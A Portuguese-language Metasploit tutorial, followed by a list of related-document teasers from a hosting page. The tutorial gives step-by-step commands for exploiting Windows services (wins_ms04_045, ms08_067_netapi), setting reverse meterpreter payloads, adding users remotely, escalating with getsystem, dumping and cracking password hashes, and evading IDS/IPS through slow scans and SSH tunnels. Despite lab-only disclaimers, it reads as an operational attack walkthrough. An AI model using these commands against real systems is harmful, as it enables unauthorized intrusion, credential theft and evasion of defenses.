Tamanho: px
Começar a partir da página:

Download ""

Transcrição

1 O Metasploit é um framework criado por H.D.Moore, que serve para elaboração e execução de um repositório de exploits. Os meus maiores agradecimentos ao H.D. Moore e sua equipe por tornarem um sonho realidade Agora que todos já sabem o que é o Metasploit, vamos aprender a trabalhar com ele. Lembrando que este tutorial só tem o objectivo de aprendizagem, cada um é responsável pelos seus actos. De qualquer forma, e devido a certos requesitos dos testes de intrusão deverão usar sempre proxy a não ser que usem um Lab com VM s Uma das coisas que hoje já existe no metasploit é uma interface gráfica via browser que simplifica o processo, apesar de aconselhar a usarem o cliente tipo linha de comandos (msfcl) A interface gráfica é o msfweb - Interface gráfica via browser Vou usar o linux mas há também a versão para windows. Então levando em consideração que tenham instalado no vosso PC e está a funcionar, vamos dar uma vista sobre a utilização desta SUPER PODEROSA FERRAMENTA... um sonho tornado realidade... para mim que ainda me lembro quando para fazer isto era preciso dezenas de tools e procedimentos... agora tá tudo integrado numa plataforma/framework. Vou também ter o cuidado de usar vulnerabilidades antigas e exploits ultrapassados para que não possa ser usado como guia total para um ataque, visto cobrir todo o percurso de exploitation. Mas basta seleccionar outros exploits para as novas coisinhas... Vejam também a, digamos, o irmão web que é a excelente w3af "Web Application Attack and Audit Framework." Apesar do metasploit também estar preparado para ataques web, mas eu especializei-me nos dois e é melhor trabalhar com as duas em conjunto. O metasploit possui várias ferramentas dentre elas: (e muitas mais para vocês explorarem... explorem os payloads, os exploits e todos os outros utilitários. Podem fazer-lo lendo ou explorando nos ficheiros ou com comandos do tipo "show payloads" ou "show exploits", entre outros.) msfconsole - metasploit em modo console msfcli - interface de automatização de penetração e exploração msflogdump - exibe sessões de arquivos de log msfplayload - usado para gerar payloads customizados

2 msfpescan - utilizado para analisar e descompilar executáveis e DLLs msfencode - um codificador interactivo de payload encoder msfupdate - utilizado para verificar e fazer download de actualização do framework msfweb - Interface gráfica via browser Hoje devido ao facto do metasploit estar na Rapid7 podem usar uma versão gratuita do detector de vulnerabilidades automático, o NeXpose Community Edition... ele detecta as vulnerabilidades e integra-se com o metasploit. Nexpose (Detector de vulnerabilidades) Podem, como eu, usar o Nessus para isso ou outras ferramentas... hoje até o nmap têm scripts para detectar vulnerabilidades, que são a principal questão no exploitation... é a partir de uma vulnerabilidade que tudo acontece e precisam saber a versão exacta do software alvo e do SO... em alguns casos no windows até a língua em que o windows esta. Algo essencial para se escolher o exploit certo é saber o serviço e a versão exacta do mesmo, pois os exploits são feitos nessa base. Para tal e se soubermos já que há uma vulnerabilidade para um apache 2 versão anterior à 2.15, podemos fazer um scan especifico com o Nmap a essa porta (80) para não dar nas vistas. É como se alguem tivesse a aceder ao site, pois apenas são enviados pacotes para a porta 80. Se fizerem um scan a todas as portas e houver algum equipamento de jeito no caminho vai detectar que é um scan e corta. Saibam o que procurar e não façam scans a todas as portas, a não ser que não haja qualquer equipamento especial, como acontece na maioria dos datacenters para as contas mais baixas. As mais usadas. Nmap st P0 A version-all T0 p 80 ipalvo (o T0 é para que haja maior espaço de tempo entre o envio de pacotes, para dificultar a detecção. Mas não é uma técnica de evasão e pode ser dispensado. O Nmap têm diversas técnicas de evasão, como spoofing, etc... explorem a documentação) Nessus (Detector de vulnerabilidades) O Nessus é um motor que interpreta scripts em NASL (ver artigo meu na 3ª Edição - Julho de 2006 que explica melhor esta linguagem) e envia-os contra um ou mais alvos, fazendo um relatório dos resultados. Estes scripts procurar milhares de vulnerabilidades, mas apensa as conhecidas. Podem desenvolver os vossos próprios scripts NASL para coisas novas. Voltando ao Metasploit, eu vou ensinar aqui a utilizar somente três destas ferramentas(msfconsole, msfcli, msfweb), pois acredito que um verdadeiro :smoke: aprenderá sozinho o restante... como sempre dou a base para futuras explorações. Ajuda ao ensino e evita script kiddies msfconsole:

3 Primeiramente digita-se na linha de comando : [root]#./msfconsole se for no windows só digite msfconsole sem./, continuando deverá aparecer algo como: (neste caso já foi usado o comando show exploits para se ter uma lista dos exploits. O comando show serve para outras coisas como payloads e opções. Ver em detalhe) Para quem dá o primeiro passo pode executar o comando help para ver os comandos de consola. Atenção que isto são apenas os comandos de consola e não todas as suas funcionalidades.

4 Como vimos na primeira imagem do mestasploit e a nivel formativo, pois no mundo a sério já saberão que exploit usar, será: show [opção] (a opção poderá ser uma das que vos aparecerão senão digitarem nenhuma, como podem ver no exemplo em seguida desta forma: msf > show msfconsole: show: requires an option: 'exploits', 'payloads', 'encoders', or 'nops' msf > Viram que apareceram as opções deste comando. O mesmo acontece com outros comandos, pois podem ir assim explorando a framework. Para saberem quais os exploits que existem nesta framework (desde a ultima actualização, devem ir actualizando o metasploit que está em constante evolução) basta digitar o comando: msf >show exploits;

5 Para saber os payloads que existem neste framework basta digitar o comando: show payloads e assim por diante. Então dentro do ambiente do metasploit escolhemos o exploit assim com o comando use :

6 msf > use wins_ms04_045 viram que eu escolhi o wins_ms04_045 e o prompt mudou. Utilizando para isto o comando: use continuando... Digitamos o nosso velho amigo : show, novamente para verificar quais atributos ele aceita. Vejamos: show msfconsole: show: specify 'targets', 'payloads', 'options', or 'advanced' Vimos aqui que ele aceita targets, payloads, options ou advanced. Vamos verificar quais opções que este exploit já seleccionado aceita:

7 show options Exploit Options =============== Exploit: Name Default Description required RHOST The target address required RPORT 42 The target port Target: Target Not Specified Este exploit aceita somente duas opções : o ip alvo e a porta alvo. Agora deves estar a perguntar... como faço para utilizar isto. Simples, basta configurar o que o exploit aceita (há diferenças entre exploits e cada vez mais, pois mais complexidade e vectores são adicionados, diferenciando cada vez mais os exploits), lembrando que onde estiver escrito required, significa que estas opções tem que ser configuradas obrigatoriamente para o exploit funcionar. Continuando... Façamos assim: set RHOST RHOST -> msf wins_ms04_04> set RPORT 42 RPORT -> 42 Vejam que utilizei a mesma porta que o valor por default... Agora teremos que seleccionar o payload para o nosso exploit. O payload nada mais é que um software acoplado ao exploit para fazer as mais variadas tarefas. Digitamos então o comando para saber os payloads suportados pelo nosso exploit: show payloads show payloads Metasploit Framework Usable Payloads

8 ==================================== win32_adduser Windows Execute net user /ADD win32_bind Windows Bind Shell win32_bind_dllinject Windows Bind DLL Inject win32_bind_meterpreter Windows Bind Meterpreter DLL Inject win32_bind_stg Windows Staged Bind Shell win32_bind_stg_upexec Windows Staged Bind Upload/Execute win32_bind_vncinject Windows Bind VNC Server DLL Inject win32_exec Windows Execute Command win32_passivex Windows PassiveX ActiveX Injection Payload win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload win32_passivex_stg Windows Staged PassiveX Shell win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload win32_reverse Windows Reverse Shell win32_reverse_dllinject Windows Reverse DLL Inject win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject win32_reverse_ord Windows Staged Reverse Ordinal Shell win32_reverse_ord_vncinject Windows Reverse Ordinal VNC Server Inject win32_reverse_stg Windows Staged Reverse Shell win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute win32_reverse_vncinject Windows Reverse VNC Server Inject Eu vou escolher o primeiro payload, que faz com que seja adicionado remotamente um utilizador no sistema windows (como tenho dito tanto sobre os payloads, hoje já há payloads para tudo e todos os SO s até uma shell especial para cracking que é o meterpreter) O meterpreter é um complexo payload que é uma espécia de shell especial para cracking, com funcionalidades especificas para isso. Algo que já falei bastante também. Documento onde é detalhado técnicamente o meterpreter: Caso queiram usar o meterpreter, na selecção do payload, escolham um com meterpreter, como por exemplo win32_reverse_meterpreter... isto vai criar uma sessão no alvo, com o meterpreter e como é reverse passa pelas firewalls, pois estas pensam que como vem de dentro da rede é confiável.

9 Assim: set PAYLOAD win32_adduser jolie PAYLOAD win32_adduser -> jolie msf wins_ms04_045> Vamos agora listar os sistemas operativos que serão os alvos: Utilizando o velho comando : show, só que agora assim: show targets show targets Supported Exploit Targets ========================= 0 Windows 2000 English Só temos uma opcao aqui, somente o windows 2000 em ingles é vulneravel, mas tudo bem... set TARGET 0 TARGET -> 0 tamos mesmo, mesmo, mesmo a um tirinho de caçadeira... valeu a pena chegar aqui... pois agora apenas falta uma coisa para completar nossa tarefa... Executar o nosso exploit, que é mais um pacote exploit (conjunto de várias coisas que antigamente se faziam em separado e com muito trabalho) do que somente um exploit. Digite somente: exploit (lindo não? Isto é disparar o exploit em direcção ao alvo. ATENÇÃO. Só usar alvos virutais ou máquinas voças exploit E pronto...acabamos a nossa primeira etapa, agora vamos passar para o msfcli. O msfcli é utilizado para poder fazer tudo de uma só vez. Nao precisando do passo a passo descrito acima. Se nós ja conhecemos o exploit isto agiliza muito o nosso trabalho na linha de comando digitamos assim:

10 [root]#./msfcli wins_ms04_045 RHOST = RPORT=42 PAYLOAD=win32_adduser teste TARGET=0 E e vejam que faz a mesma coisa que no modo console. Caso o exploit se direcione a um serviço sem previlégios especiais pode-se usar um exploit local para escalar previlégios ou os seguintes comandos do meterpreter. Atenção que neste caso terão de estar a usar o meterpreter (para isso terão na altura de selecção do payload escolher um especial com o meterpreter, como por exemplo win32_reverse_meterpreter) E na sessão do meterpreter usem os scripts já existentes para isso, como apresento em baixo. meterpreter> use priv meterpreter> getsystem Mais coisas interessantes que se podem fazer com o meterpreter em conjunto com outras ferrametas geniáis, como o LophtCrack ou o Cain e Abel para crackar hashes de passwords. Has passwords estão codificadas mas podem ser sacadas e posteriormente crackadas... garanto que conseguirão algumas que não sejam muito fortes, o que é muito normal. Por exemplo. Como fazer o dump das hashes das passowrds com o meterpreter e fazer o download para depois as crackarem com algum dos programas anteriormente mencionados..msfconsole > use windows/smb/ms08_067_netapi > set PAYLOAD windows/meterpreter/reverse_tcp > set LHOST (meu Ip) > set RHOST (Ip Remoto) > exploit > getuid > hashdump > use -f cmd -c Para fazer downloads ou uploads dentro do meterpreter, entre o vosso PC e o alvo comprometido. meterpreter> download arquivo1 arquivo2 pastadestino meterpreter> upload arquivo1 arquivo2 pastadestino

11 Para crackar as hashes eu uso o LOphtCrack. É só guardar o resultado do "hashdump" num.txt (meuhash.txt) e usa-lo no LOphtCrack. Garanto que terão algumas passwords interessantes. (investiguem também a familia Pwdump... muito interessante para certas situações.) Citar pwdump is the name of various Windows programs that output the LM and NTLM password hashes of local user accounts from the Security Account Manager (SAM). In order to work, it must be run under an Administrator account, or be able to access an Administrator account on the computer where the hashes are to be dumped; so Pwdump does not compromise security. Most of these programs are open-source. (aqui são explicadas as várias cores e sabores e seus links) Vamos passar para uma forma ainda mais fácil. Garanto que o ppl mais windows vão adorar esta forma, que é um GUI (Grafical User Interface... mas no mundo dos exploits? Sim... vejam) Trata-se da ferramenta msfweb que quando executado permite fazermos tudo por uma pagina web, todas as funcionalidades aplicaveis estão lá. Para acederem ao GUI do metasploit façam: [root]#./msfweb +----=[ Metasploit Framework Web Interface (ip:55555) Deixar correr... Abrir em seguida o browser e digitar o url: teu ip, localhost, Mais a porta Seria assim: E assim verão a magia desta ferramenta. Um rico GUI onde facilmente qualquer um pode configurar uma sessão completa, sem digitar comandos em consolas. Claro que no alvo vão (ou não) usar a consola, pois é mais... Poderemos com isto fazer tudo graficamente sem digitar comandos etc etc, somente seleccionando. Para complementar e devido a essas novas IPS e IDS que detectam padrões de tráfego e podem ser actualizadas com as assinaturas dos novos exploits, aqui fica um extra dedicado às novas appliances PANDA Com um tunnel SSH o tráfego vai encriptado e não é possível identificar o mesmo, o que

12 vai dentro dessa sessão. É uma das mais usadas técnicas de evasão, Criando uma sessão meterpreter persistente sobre um túnel SSH (integrando com o metasploit) Podem ver muitos videos que até já apresentei alguns, com tudo isto em "real" e muito mais... investiguem por ai, pois há magia no ar teckv

Metasploit Sabe o que é?

Metasploit Sabe o que é? Metasploit Sabe o que é? é uma plataforma que permite a verificação do estado da segurança dos computadores existentes numa determinada rede, permitindo atacar as falhas de segurança existentes nos mais

Leia mais

Metasploit Hands On. Rafael Soares Ferreira Clavis Segurança da Informação

Metasploit Hands On. Rafael Soares Ferreira Clavis Segurança da Informação Metasploit Hands On Rafael Soares Ferreira Clavis Segurança da Informação rafael@clavis.com.br $ whoami Grupo Clavis Sócio Diretor Técnico Análise forense computacional Detecção e resposta a incidentes

Leia mais

O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos

O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos computadores existentes numa determinada rede, permitindo

Leia mais

Armitage, ferramenta de gerenciamento de ataque cibernético

Armitage, ferramenta de gerenciamento de ataque cibernético Armitage, ferramenta de gerenciamento de ataque cibernético Alex Sander 22 de março de 201622 de março de 2016 3 Comentários O Armitage é uma ferramenta de gerenciamento de ataques cibernéticos em modo

Leia mais

Introdução ao Metasploit Framework

Introdução ao Metasploit Framework Introdução ao Metasploit Framework Veremos o Metasploit Framework, uma ferramenta que tornou-se padrão para pentesters. Lançado pela primeira vez em 2003, Metasploit alcançou status na comunidade de segurança.

Leia mais

Formação em Segurança Cibernética. Sessão 4 Explorando vulnerabilidades em redes

Formação em Segurança Cibernética. Sessão 4 Explorando vulnerabilidades em redes Formação em Segurança Cibernética Sessão 4 Explorando vulnerabilidades em redes Levantamento de Vulnerabilidades Ferramentas - HPING A ferramenta HPING é um gerador e analisador de pacotes TCP/IP muito

Leia mais

Ferramenta Nessus e suas funcionalidades

Ferramenta Nessus e suas funcionalidades Ferramenta Nessus e suas funcionalidades Alberto S. Matties 1 1 Curso Superior de Tecnologia em Redes de Computadores Rua Gonçalves Chaves 602 96.015-000 Pelotas RS Brasil 2 FACULDADE DE TECNOLOGIA SENAC

Leia mais

Windows 10: Aprenda a abrir um porto na Firewall

Windows 10: Aprenda a abrir um porto na Firewall Windows 10: Aprenda a abrir um porto na Firewall Date : 28 de Novembro de 2017 Não desligue a Firewall crie regras! Todos nós temos a noção que é importante dispormos de mecanismos de segurança nos nossos

Leia mais

Ferramentas Web, Web 2.0 e Software Livre em EVT

Ferramentas Web, Web 2.0 e Software Livre em EVT E s t u d o s o b r e a i n t e g r a ç ã o d e f e r r a m e n t a s d i g i t a i s n o c u r r í c u l o d a d i s c i p l i n a d e E d u c a ç ã o V i s u a l e T e c n o l ó g i c a FFONTS M a n

Leia mais

NO-IP - Eu quero um IP fixo!

NO-IP - Eu quero um IP fixo! NO-IP - Eu quero um IP fixo! Date : 5 de Janeiro de 2009 Quantos vezes já esteve na situação de precisar de algo que está no vosso computador lá em casa e não conseguir chegar remotamente a ele? A ideia

Leia mais

Aprenda a usar a Firewall do Windows 8 (Parte I)

Aprenda a usar a Firewall do Windows 8 (Parte I) Aprenda a usar a Firewall do Windows 8 (Parte I) Date : 20 de Março de 2013 Não desligue a Firewall.crie regras! Todos nós temos a noção que é importante dispormos de mecanismos de segurança nos nossos

Leia mais

NSA HACKING. Jonathan Messias Washington Silas

NSA HACKING. Jonathan Messias Washington Silas NSA HACKING Jonathan Messias jonathan.messias@gemina.io Washington Silas washington.souza@gemina.io Introdução O que é o WannaCry? O ransomware WannaCry visa redes que usam SMBv1, um protocolo que ajuda

Leia mais

Raspbian XFCE + XBMC v3 via Comunidade Linux Pplware

Raspbian XFCE + XBMC v3 via Comunidade Linux Pplware Raspbian XFCE + XBMC v3 via Comunidade Linux Pplware Date : 8 de Outubro de 2013 Tenha a melhor performance no seu Raspberry PI O Raspberry Pi é um dos mini PCs mais populares e potentes, que tem servido

Leia mais

André Luis Staroski Clovis Cristiano Brignoli Fabiano F. Maciel Guimarães

André Luis Staroski Clovis Cristiano Brignoli Fabiano F. Maciel Guimarães André Luis Staroski Clovis Cristiano Brignoli Fabiano F. Maciel Guimarães O Nmap é um portscan de uso geral; O Nmap está disponível em todas as principais distribuições; O uso mais simples é escanear

Leia mais

Aprenda a instalar a plataforma de monitorização Cacti

Aprenda a instalar a plataforma de monitorização Cacti Aprenda a instalar a plataforma de monitorização Cacti Date : 27 de Março de 2014 Um administrador deve possuir as melhores ferramentas de monitorização para que tenha uma visão facilitada de toda a rede.

Leia mais

Aprenda a instalar o GLPI no Centos 6.5

Aprenda a instalar o GLPI no Centos 6.5 Aprenda a instalar o GLPI no Centos 6.5 Date : 31 de Janeiro de 2014 Solução fantástica para Gestão total do seu parque informático: Experimente já aqui Quando se é administrador de um parque informático

Leia mais

IDES E PROGRAMAÇÃO. Prof. Dr. Cláudio Fabiano Motta Toledo PAE: Maurício A Dias

IDES E PROGRAMAÇÃO. Prof. Dr. Cláudio Fabiano Motta Toledo PAE: Maurício A Dias 1 IDES E PROGRAMAÇÃO Prof. Dr. Cláudio Fabiano Motta Toledo PAE: Maurício A Dias {claudio,macdias}@icmc.usp.br 2 Agenda Conceitos Instalação e Configuração Compilação e Execução de Código IDEs Exemplo

Leia mais

TRABALHO INTRUSÃO DE REDES

TRABALHO INTRUSÃO DE REDES TRABALHO INTRUSÃO DE REDES Software Metasploit Framework O que é > Metasploit Framework é uma avançada plataforma Open Source, concebida especificamente com o objetivo de reforçar e acelerar o desenvolvimento,

Leia mais

Manual de iniciação para AZBox Elite/Premium

Manual de iniciação para AZBox Elite/Premium Manual de iniciação para AZBox Elite/Premium Elaborado por @lagosta Desenvolvido para http://www.dragteam.info/forum/ Versão 0.1 Para quem está interessado em pôr a AZBOX Elite HD a bombar (salvo erro

Leia mais

Analisar e demonstrar a aplicação da ferramenta Metasploit. Vmware Player, Putty, Backtrack, Windows Server 2003, CentOS e Metasploit.

Analisar e demonstrar a aplicação da ferramenta Metasploit. Vmware Player, Putty, Backtrack, Windows Server 2003, CentOS e Metasploit. Unidade Curricular Segurança em Redes Prof. Eduardo Maroñas Monks Aluno Gérson Porciúncula Siqueira Roteiro de Laboratório Ferramentas de Segurança - Metasploit Objetivo: Analisar e demonstrar a aplicação

Leia mais

Transforme o seu CentOS num servidor Web (LAMP)

Transforme o seu CentOS num servidor Web (LAMP) Transforme o seu CentOS num servidor Web (LAMP) Date : 9 de Outubro de 2013 Todos nós sabemos que as distribuições Linux são extremamente potentes e flexíveis, e que a maioria dos servidores, espalhados

Leia mais

Guia da Aula Prática H.323. Página 1 de 5

Guia da Aula Prática H.323. Página 1 de 5 Guia da Aula Prática H.323 A ficha seguinte deve ser executada a partir de grupos de 3 PCs, sendo que por PC deverá estar um grupo de alunos. Dois PCs serão os clientes e o terceiro será o Gatekeeper.

Leia mais

Serviços de Informática :: Divisão de Infraestruturas e Serviços :: Universidade de Évora

Serviços de Informática :: Divisão de Infraestruturas e Serviços :: Universidade de Évora Guia de utilização do Colibri Instalação do software Criar Sessão Consultar as sessões criadas Participar numa sessão Gravação de Sessões Iniciar a gravação de uma sessão Descarregar a gravação Versões

Leia mais

Guia de utilização do servidor da disciplina

Guia de utilização do servidor da disciplina Sistemas Operativos Escola de Tecnologias e Arquitectura Dep. de Ciências e Tecnologias da Informação Servidor da disciplina tigre.iul.lab Guia de utilização do servidor da disciplina 1 Introdução Os diferentes

Leia mais

Sobre o Visual C++ 2010

Sobre o Visual C++ 2010 O Visual Studio é um pacote de programas da Microsoft para desenvolvimento de software, suportando diversas linguagens como C#, C++, C, Java, Visual Basic, etc. Nesta série de tutoriais vou focar apenas

Leia mais

Tutorial: Criar um servidor SFTP no Windows para acesso remoto

Tutorial: Criar um servidor SFTP no Windows para acesso remoto Tutorial: Criar um servidor SFTP no Windows para acesso remoto Date : 4 de Março de 2017 Antes da massificac?a?o de servic?os baseados na "nuvem como o Dropbox, Google Drive, OneDrive, entre outros, o

Leia mais

Bases de Dados. Lab 1: Introdução ao ambiente. Figura 1. Base de dados de exemplo

Bases de Dados. Lab 1: Introdução ao ambiente. Figura 1. Base de dados de exemplo Departamento de Engenharia Informática 2013/2014 Bases de Dados Lab 1: Introdução ao ambiente 1º semestre O ficheiro bank.sql contém um conjunto de instruções SQL para criar a base de dados de exemplo

Leia mais

Guião para a instalação do Ubuntu (Versão 1.1 em 30 Set 07)

Guião para a instalação do Ubuntu (Versão 1.1 em 30 Set 07) MIEEC 2007/08 Ramo Automação Disciplina Sistemas de Informação Empresariais Guião para a instalação do Ubuntu (Versão 1.1 em 30 Set 07) Introdução Este documento foi elaborado com o propósito de auxiliar

Leia mais

Fundamentos de Ethical Hacking EXIN. Guia de Preparação. Edição

Fundamentos de Ethical Hacking EXIN. Guia de Preparação. Edição Fundamentos de Ethical Hacking EXIN Guia de Preparação Edição 201701 Copyright EXIN Holding B.V. 2017. All rights reserved. EXIN is a registered trademark. No part of this publication may be reproduced,

Leia mais

Metasploit Framework Versão 2.2 User Crash Course

Metasploit Framework Versão 2.2 User Crash Course Metasploit Framework Versão 2.2 User Crash Course Introdução Este documento é uma tentativa de prover um guia do usuário para a versão 2.2 do Metasploit Framework e tem como principais objetivos dar uma

Leia mais

Quando a máquina terminar o arranque e lhe pedir as credenciais para entrar, introduza as seguintes:

Quando a máquina terminar o arranque e lhe pedir as credenciais para entrar, introduza as seguintes: Segurança Informa tica e nas Organizaço es Vulnerabilidades na Web (V1.1) Este trabalho deve ser realizado na máquina virtual Ubuntu10tm que pode descarregar de ftp://www.ieeta.pt/avzdatastore/vulnerable%20linux/ubuntu10tm.zip,

Leia mais

Ferramentas Web, Web 2.0 e Software Livre em EVT

Ferramentas Web, Web 2.0 e Software Livre em EVT E s t u d o s o b r e a i n t e g r a ç ã o d e f e r r a m e n t a s d i g i t a i s n o c u r r í c u l o da d i s c i p l i n a d e E d u c a ç ã o V i s u a l e T e c n o l ó g i c a AnimPixels M a

Leia mais

Cross-Site Scripting (XSS): Entendendo o conceito e seus tipos

Cross-Site Scripting (XSS): Entendendo o conceito e seus tipos Cross-Site Scripting (XSS): Entendendo o conceito e seus tipos Talvez a vulnerabilidade de segurança de aplicações web mais comum e mais debatido é Cross-Site Scripting (XSS). Quando tais vulnerabilidades

Leia mais

Instalando o software de gerencia (ANM2000)

Instalando o software de gerencia (ANM2000) Instalando o software de gerencia (ANM2000) Descrição: Para ter a gerencia das OLTs e ONUs da rede FTTx, precisa ser instalado o software de gerencia da Fiberhome, chamado ANM2000. Requisitos: - Servidor

Leia mais

INSTALAÇÃO QGIS VERSÃO LTR EM WINDOWS

INSTALAÇÃO QGIS VERSÃO LTR EM WINDOWS Este documento, aborda o processo de instalação da versão LTR (long term release) do QGIS em ambiente Windows. Existem duas formas de instalação do QGIS em ambiente Windows: Versão Standalone, é a instalação

Leia mais

Chegou o Pipplware 3.1 com suporte para o novo Raspberry 2

Chegou o Pipplware 3.1 com suporte para o novo Raspberry 2 Chegou o Pipplware 3.1 com suporte para o novo Raspberry 2 Date : 9 de Fevereiro de 2015 O PiPplware é uma distribuição Linux portuguesa para o Raspberry PI baseada e 100% compatível com o Raspbian, a

Leia mais

Conheça 5 dicas que deve usar já no seu Windows 10

Conheça 5 dicas que deve usar já no seu Windows 10 Conheça 5 dicas que deve usar já no seu Windows 10 Date : 20 de Fevereiro de 2017 O Windows 10 está a ser construído pela Microsoft de forma progressiva. A cada nova versão surgem melhorias substanciais

Leia mais

Windows Server 2008 Vamos criar um domínio

Windows Server 2008 Vamos criar um domínio Windows Server 2008 Vamos criar um domínio Date : 25 de Outubro de 2013 No Pplware temos abordado as características e funcionalidades dos mais diversos sistemas operativos. Apesar de hoje em dia os sistemas

Leia mais

Actualizações de software Manual do utilizador

Actualizações de software Manual do utilizador Actualizações de software Manual do utilizador Copyright 2009 Hewlett-Packard Development Company, L.P. Microsoft é uma marca registada da Microsoft Corporation nos E.U.A. As informações contidas neste

Leia mais

Instalação do ClearOS como Gateway/Firewall Parte I

Instalação do ClearOS como Gateway/Firewall Parte I Instalação do ClearOS como Gateway/Firewall Parte I Date : 30 de Novembro de 2012 Por Tiago Ramalho para o PPLWARE.COM O ClearOS Community é um sistema operativo desenhado para pequenas e médias empresas,

Leia mais

CONFIGURAÇÃO DA CAIXA DE CORREIO ELETRÓNICO

CONFIGURAÇÃO DA CAIXA DE CORREIO ELETRÓNICO CONFIGURAÇÃO DA CAIXA DE CORREIO ELETRÓNICO Outlook 2013 / 2016 & definições genéricas Criado/ Revisto Por: Revisto em: Contacto: DI-IPS Maio 2017 Apoio.informatico@ips.pt ÍNDICE Introdução... 4 Configuração

Leia mais

CONFIGURAÇÃO DA CAIXA DE CORREIO ELETRÓNICO

CONFIGURAÇÃO DA CAIXA DE CORREIO ELETRÓNICO CONFIGURAÇÃO DA CAIXA DE CORREIO ELETRÓNICO Outlook 2013 / 2016 & definições genéricas Criado/ Revisto Por: Revisto em: Contacto: DI-IPS Março 2017 Apoio.informatico@ips.pt Fevereiro 2018 ÍNDICE Índice...

Leia mais

IMPORTANTE: é fundamental que o IP das câmeras esteja dentro da faixa da sua rede, senão a comunicação não será possível.

IMPORTANTE: é fundamental que o IP das câmeras esteja dentro da faixa da sua rede, senão a comunicação não será possível. Instalando e configurando câmeras IP Wanscam séries JW e AJ Todas as câmeras IP funcionam por meio de rede de comunicação do tipo ethernet, que é o padrão mundial de rede de computadores. Esta rede pode

Leia mais

EOLPP. Manual do utilizador

EOLPP. Manual do utilizador EOLPP Manual do utilizador Introdução... 3 Objetivos... 3 Convenções de Linguagem... 3 Acesso à EOLPP... 4 Funcionalidades Comuns a Todas as Páginas... 6 Página Principal... 7 Consultas... 8 Download da

Leia mais

Dica - Como remover a tabela de Partição GUID (GPT)

Dica - Como remover a tabela de Partição GUID (GPT) Dica - Como remover a tabela de Partição GUID (GPT) Date : 5 de Agosto de 2013 Necessita de instalar o Windows 8? Então vai ter problemas! No inicio desta semana, após as tradicionais actualizações do

Leia mais

Ferramentas Web, Web 2.0 e Software Livre em EVT

Ferramentas Web, Web 2.0 e Software Livre em EVT E s t u d o s o b r e a i n t e g r a ç ã o d e f e r r a m e n t a s d i g i t a i s n o c u r r í c u l o d a d i s c i p l i n a d e E d u c a ç ã o V i s u a l e T e c n o l ó g i c a Drawpile M a

Leia mais

Dectando falha no IMAP para explorar com exploits do Metasploit. Inj3cti0n P4ck3t

Dectando falha no IMAP para explorar com exploits do Metasploit. Inj3cti0n P4ck3t Dectando falha no IMAP para explorar com exploits do Metasploit Inj3cti0n P4ck3t São Paulo 2010 Nome: Fernando Henrique Mengali de Souza Contato: fer_henrick@hotmail.com Linguagem de Programação: Perl

Leia mais

Conselho Geral da Ordem Dos Advogados Departamento Informático

Conselho Geral da Ordem Dos Advogados Departamento Informático Nota Introdutória: Este documento destina-se a guiá-lo(a) através dos vários procedimentos necessários para configurar a sua caixa de correio da Ordem dos Advogados, no programa Windows Live Mail Versão

Leia mais

Auditando e criando relatório de análise de vulnerabilidades com Nessus

Auditando e criando relatório de análise de vulnerabilidades com Nessus Auditando e criando relatório de análise de vulnerabilidades com Nessus Ciência Hacker 8 de novembro de 2015 Deixe um comentário Nessus é uma das ferramentas mais recomendadas para fazer análise de vulnerabilidade,

Leia mais

Guia de apoio à utilização. de serviços WFS, através do software GeoMedia

Guia de apoio à utilização. de serviços WFS, através do software GeoMedia Guia de apoio à utilização de serviços WFS, através do software GeoMedia junho de 2015 1 Índice I. Guia de apoio à utilização de serviços WFS... 3 II. Problemas mais comuns no acesso ao serviço WFS...

Leia mais

Ferramentas Web, Web 2.0 e Software Livre em EVT

Ferramentas Web, Web 2.0 e Software Livre em EVT E s t u d o s o b r e a i n t e g r a ç ã o d e f e r r a m e n t a s d i g i t a i s n o c u r r í c u l o d a d i s c i p l i n a d e E d u c a ç ã o V i s u a l e T e c n o l ó g i c a Urban Painter

Leia mais

Proteja-se configurando bem o Windows Defender no Windows 10

Proteja-se configurando bem o Windows Defender no Windows 10 Proteja-se configurando bem o Windows Defender no Windows 10 Date : 29 de Novembro de 2016 Os antivírus são uma presença obrigatória nos sistemas operativos para proteger os utilizadores contra todos os

Leia mais

Este curso pretende dotar os participantes dos conhecimentos e conceitos básicos envolvidos na operação dos sistemas operativos Linux (GNU/Linux).

Este curso pretende dotar os participantes dos conhecimentos e conceitos básicos envolvidos na operação dos sistemas operativos Linux (GNU/Linux). Linux Fundamentos Tecnologias de Informação - Redes e Sistemas Localidade: Lisboa Data: 05 Jun 2017 Preço: 420 ( Os valores apresentados não incluem IVA. Oferta de IVA a particulares e estudantes. ) Horário:

Leia mais

Sabe fazer backups do Windows 10? E recuperar ficheiros?

Sabe fazer backups do Windows 10? E recuperar ficheiros? Sabe fazer backups do Windows 10? E recuperar ficheiros? Date : 4 de Janeiro de 2017 Com os perigos a que estamos expostos hoje em dia, é importante ter preparados backups e outros mecanismos para salvaguardar

Leia mais

ESET Remote Administrator Versão 6.5

ESET Remote Administrator Versão 6.5 ESET Remote Administrator Versão 6.5 Guia Rápido Índice 1. Objetivo 3 2. Componentes 4 2.1 Servidor ERA / Agente / Certificados 4 3. Licenciamento 5 4. Métodos de Instalação 6 4.1 Instalação Servidor ESET

Leia mais

Dica: Como criar uma pen de instalação do OSX El Capitan

Dica: Como criar uma pen de instalação do OSX El Capitan Dica: Como criar uma pen de instalação do OSX El Capitan Date : 4 de Outubro de 2015 Tal como prometido pela Apple, de forma indirecta, o OSX 10.11 El Capitan chegou esta semana. Com várias novidades,

Leia mais

Como acessar as imagens via Navegador Mozilla Firefox

Como acessar as imagens via Navegador Mozilla Firefox Como acessar as imagens via Navegador Mozilla Firefox Antes de iniciar o procedimento de como realizar o(s) Acesso(s) Remoto(s) (Endereço IP em Rede Local, ou via Nuvem, ou via DDNS) através do Navegador

Leia mais

Guia Técnico v6.1 SNMP TG Conteúdo

Guia Técnico v6.1 SNMP TG Conteúdo Manual Guia Técnico de Administração v6.1 - Conteúdo Introdução 3 Definições 3 Protocolos suportados 3 MIB suportadas 4 Configuração 4 Views e Communities 4 Acessos 6 Traps 6 Utilização 7 Download de configurações

Leia mais

O Windows desde... sempre! - Parte #0

